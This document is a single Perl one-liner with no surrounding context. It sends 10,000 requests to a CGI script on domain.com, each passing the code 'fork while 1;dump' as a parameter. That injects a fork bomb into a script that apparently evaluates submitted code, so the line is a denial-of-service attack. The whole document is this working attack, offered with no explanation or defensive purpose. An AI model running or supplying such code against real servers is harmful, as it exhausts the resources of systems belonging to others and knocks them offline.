use LWP::Simple; get( 'http://domain.com/cgi-bin/safe.pl?code=fork+while+1;dump' ) for 1..10000;